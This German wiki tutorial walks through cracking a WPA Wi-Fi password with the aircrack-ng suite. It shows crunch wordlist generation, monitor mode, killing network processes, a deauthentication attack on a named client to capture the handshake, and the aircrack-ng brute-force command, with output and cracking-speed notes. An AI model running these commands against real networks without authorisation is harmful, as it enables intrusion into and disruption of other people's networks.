Wlan Bruteforce Attacke

Aus xinux.net
Zur Navigation springen Zur Suche springen


  1. Passwort liste generieren
  2. Interface suchen
  3. Interface Monitor mode
  4. Prozesse die stören killen
  5. Wlans anzeigen
  6. capture AP
  7. auf Client Handshake warten (eventuell Verbindung killen)
  8. Brute Force auf Datei starten
  9. Erfolg

passwordlist generieren

  • crunch 8 8 0123456789 -o password.lst
Crunch will now generate the following amount of data: 900000000 bytes
858 MB
0 GB
0 TB
0 PB
Crunch will now generate the following number of lines: 100000000 

crunch:  19% completed generating output

crunch:  38% completed generating output

crunch:  58% completed generating output

crunch:  76% completed generating output

crunch:  95% completed generating output

crunch: 100% completed generating output


  • airmon-ng
PHY	Interface	Driver		Chipset

phy0	wlan0		iwl3945		Intel Corporation PRO/Wireless 3945ABG [Golan] (rev 02)
phy1	wlan1		rtl8192cu	Edimax Technology Co., Ltd EW-7811Un 802.11n [Realtek RTL8188CUS]

monitor modus

  • airmon-ng start wlan1

airmon-ng start wlan1

Found 5 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!

  PID Name
  618 NetworkManager
  712 wpa_supplicant
  825 avahi-daemon
  826 avahi-daemon
 1520 dhclient

PHY	Interface	Driver		Chipset

phy0	wlan0		iwl3945		Intel Corporation PRO/Wireless 3945ABG [Golan] (rev 02)
phy1	wlan1		rtl8192cu	Edimax Technology Co., Ltd EW-7811Un 802.11n [Realtek RTL8188CUS]
		(mac80211 monitor mode vif enabled for [phy1]wlan1 on [phy1]wlan1mon)
		(mac80211 station mode vif disabled for [phy1]wlan1)

killen der problem prozesse

  • kill -9 618
  • kill -9 712
  • kill -9 825
  • kill -9 826
  • kill -9 1520


  • airmon-ng check wlan1mon
No interfering processes found
  • falls noch was gestartet

systemctl disable avahi-daemon

service network-manager stop


  • airodump-ng wlan1mon


handshake besorgen

  • airodump-ng --bssid 00:18:F8:DA:F7:94 -c 6 -w wlan.cap wlan1mon


zweites fenster öffnen

  • aireplay-ng -0 50 -a 00:18:F8:DA:F7:94 -c 44:74:6C:54:68:E8 wlan1mon
11:02:39  Waiting for beacon frame (BSSID: 00:18:F8:DA:F7:94) on channel 6
11:02:39  Sending 64 directed DeAuth. STMAC: [44:74:6C:54:68:E8] [ 0| 4 ACKs]
11:02:40  Sending 64 directed DeAuth. STMAC: [44:74:6C:54:68:E8] [ 0| 6 ACKs]
11:02:40  Sending 64 directed DeAuth. STMAC: [44:74:6C:54:68:E8] [ 0| 8 ACKs]
11:02:41  Sending 64 directed DeAuth. STMAC: [44:74:6C:54:68:E8] [ 0| 7 ACKs]
11:02:44  Sending 64 directed DeAuth. STMAC: [44:74:6C:54:68:E8] [ 3|43 ACKs]
11:02:49  Sending 64 directed DeAuth. STMAC: [44:74:6C:54:68:E8] [36|68 ACKs]
11:02:55  Sending 64 directed DeAuth. STMAC: [44:74:6C:54:68:E8] [ 2|65 ACKs]
11:03:00  Sending 64 directed DeAuth. STMAC: [44:74:6C:54:68:E8] [ 0|63 ACKs]
11:03:05  Sending 64 directed DeAuth. STMAC: [44:74:6C:54:68:E8] [ 2|64 ACKs]
11:03:10  Sending 64 directed DeAuth. STMAC: [44:74:6C:54:68:E8] [ 2|64 ACKs]
11:03:15  Sending 64 directed DeAuth. STMAC: [44:74:6C:54:68:E8] [ 0|64 ACKs]
11:03:21  Sending 64 directed DeAuth. STMAC: [44:74:6C:54:68:E8] [ 4|65 ACKs]
11:03:26  Sending 64 directed DeAuth. STMAC: [44:74:6C:54:68:E8] [ 0|64 ACKs]
11:03:32  Sending 64 directed DeAuth. STMAC: [44:74:6C:54:68:E8] [ 0|61 ACKs]
11:03:37  Sending 64 directed DeAuth. STMAC: [44:74:6C:54:68:E8] [ 3|65 ACKs]
11:03:42  Sending 64 directed DeAuth. STMAC: [44:74:6C:54:68:E8] [ 2|63 ACKs]
11:03:47  Sending 64 directed DeAuth. STMAC: [44:74:6C:54:68:E8] [ 0|64 ACKs]
11:03:52  Sending 64 directed DeAuth. STMAC: [44:74:6C:54:68:E8] [ 0|64 ACKs]
11:03:57  Sending 64 directed DeAuth. STMAC: [44:74:6C:54:68:E8] [26|67 ACKs]
11:04:02  Sending 64 directed DeAuth. STMAC: [44:74:6C:54:68:E8] [ 2|65 ACKs]
11:04:07  Sending 64 directed DeAuth. STMAC: [44:74:6C:54:68:E8] [ 0|63 ACKs]
11:04:12  Sending 64 directed DeAuth. STMAC: [44:74:6C:54:68:E8] [ 0|64 ACKs]

bis der client rausfliegt

nach dem widerverbinden kommt der handshake





  • aircrack-ng -w password.lst -b 00:18:F8:DA:F7:94 wlan.cap-01.cap


Crack geschwindigkeiten

Laptop Schaft circa 1000 Keys pro Sekunde

eine starke Grafikkarte (Titan XP) schaft 520000 hash/s

Bei bedarf kann man sich auch online Rechen power mieten


oder sich ein Cluster aus mehreren Grafikkarten bauen

Quelle http://www.crackingservice.com/?q=node/20